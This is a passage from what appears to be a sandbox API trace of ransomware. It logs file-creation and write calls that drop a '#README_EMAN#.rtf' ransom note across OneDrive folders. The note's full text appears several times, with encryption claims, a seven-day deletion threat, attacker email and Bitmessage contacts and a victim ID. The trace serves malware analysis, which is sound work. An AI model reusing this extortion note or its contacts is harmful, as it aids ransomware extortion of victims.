thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0299.053] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0299.054] CloseHandle (hObject=0x27c) returned 1 [0299.054] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls.2\\#readme_eman#.rtf")) returned 0x20 [0299.054] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls\\Styles\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls\\styles\\#readme_eman#.rtf")) returned 0xffffffff [0299.055] GetLastError () returned 0x2 [0299.055] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls\\Styles\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls\\styles\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0299.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 